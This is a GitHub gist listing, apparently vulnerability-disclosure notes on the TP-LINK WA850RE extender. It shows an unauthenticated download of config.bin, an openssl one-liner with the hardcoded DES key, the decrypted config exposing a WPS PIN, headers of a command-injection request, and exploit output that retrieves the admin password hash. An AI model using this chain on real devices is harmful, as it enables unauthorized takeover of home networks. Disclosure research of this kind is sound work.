Skip to content

Instantly share code, notes, and snippets.

@eacmen
eacmen / injection-sample.http
Last active February 19, 2019 19:44
TP-LINK WL-WA850RE Example Command Injection HTTP Request
POST /data/wps.setup.json HTTP/1.1
Origin: http://192.168.0.254
Content-Length: 100
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Connection: close
Accept: application/json, text/javascript, /; q=0.01
User-Agent: Mozilla/5.0
Host: 192.168.0.254
X-Requested-With: XMLHttpRequest
@eacmen
eacmen / function-to-urlmap.txt
Created July 20, 2018 00:32
TP-LINK WL-WA850RE Function to URL Mapping
sub_40B990 => /fs/pages/userrpm/timeSettings_dst.html
sub_40E0C8 => /fs/pages/userrpm/connect.html
sub_40E144 => /fs/pages/userrpm/extend-settings.html
sub_40E04C => /fs/pages/userrpm/accessControl_adv.html
sub_40DF54 => /fs/pages/userrpm/region.html
sub_40DFD0 => /fs/pages/userrpm/wirelessSettings.html
sub_416DC0 => /fs/pages/userrpm/wifiCoverage.html
sub_418040 => /fs/pages/userrpm/dhcp.html
sub_419C90 => /fs/pages/userrpm/led.html
sub_41B484 => /fs/pages/frame/quick-setup.html
@eacmen
eacmen / get-config-bin.txt
Created July 20, 2018 00:35
TP-LINK WL-WA850RE Getting Encrypted Config.bin
$ wget http://192.168.0.254/fs/data/config.bin
–2018–07–15 14:22:50– http://192.168.0.254/fs/data/config.bin
Connecting to 192.168.0.254:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: unspecified [x-bin/octet-stream]
Saving to: ‘config.bin’
2018–07–15 14:22:50 (127 MB/s) - ‘config.bin’ saved [1120]
@eacmen
eacmen / decrypt-config-bin.txt
Created July 20, 2018 00:37
TP-LINK WL-WA850RE Decryption Key One-Liner for config.bin
$ openssl enc -d -des-ecb -nopad -K 478DA50BF9E3D2CF -in config.bin > decrypted.bin
@eacmen
eacmen / binwalk-decompress-config.txt
Created July 20, 2018 00:45
TP-LINK WL-WA850RE - Decompressing Decrypted config.bin
$ binwalk -e decrypted.bin
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
144 0x90 Zlib compressed data, default compression
$ file _decrypted.bin.extracted/90
_decrypted.bin.extracted/90: ASCII text, with very long lines, with no line terminators
@eacmen
eacmen / config-bin.json
Created July 20, 2018 01:38
TP-LINK WL-WA850RE Decrypted/Decompressed config.bin into JSON
{
"WPS" : {
"pinCode" : "46209573admin",
"pinEnabled" : 1,
"enabled" : 1,
"staWpsAvailable" : 3,
"apWpsAvailable" : 3
},
"POWER" : {
"start" : 75600,
@eacmen
eacmen / login.html
Created July 20, 2018 01:45
TP-LINK WL-WA850RE Login Page
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="pragma" content="no-cache">
<meta http-equiv="cache-control" content="no-cache, must-revalidate">
<meta http-equiv="expires" content="0">
@eacmen
eacmen / tplink-unauth-exploit.py
Created July 20, 2018 01:49
TP-LINK WL-WA850RE POC Unauthenticated Exploit
@eacmen
eacmen / exploit-output.txt
Last active July 20, 2018 01:53
TP-LINK WL-WA850RE Example Exploit Output
$ python ./exploit.py 192.168.0.254
[+] Requesting browser cookie…
[+] Retrieved cookie: ‘COOKIE=6500a8c000184c02; PATH=/; MAXAGE=9999; VERSION=1’
[+] Attempting to retrieve device configuration data…
[+] Got encrypted config file for model: TL-WA850RE v5.0
[+] Decrypting config file…
[+] Decompressing configuration data…
[+] Admin username: ‘admin’
[+] Admin password (MD5): ‘1048552CDE8EBBBE4CAEF9D3B95AB41B’
[+] Attempting login with password only…
@eacmen
eacmen / reset-service.sh
Created September 18, 2019 19:17
wipe a container state from existence
#!/bin/bash
SERVICE=$1
read -r -p "This will completely wipe the ${SERVICE} database and restart the service. Are you sure? [y/N] " response
if [[ "$response" =~ ^([yY][eE][sS]|[yY])+$ ]]
then
docker-compose stop ${SERVICE}
docker-compose rm ${SERVICE}
VOLUME=`docker volume ls | grep ${SERVICE} | tr -s ' ' | cut -d' ' -f2`
docker volume rm -f ${VOLUME}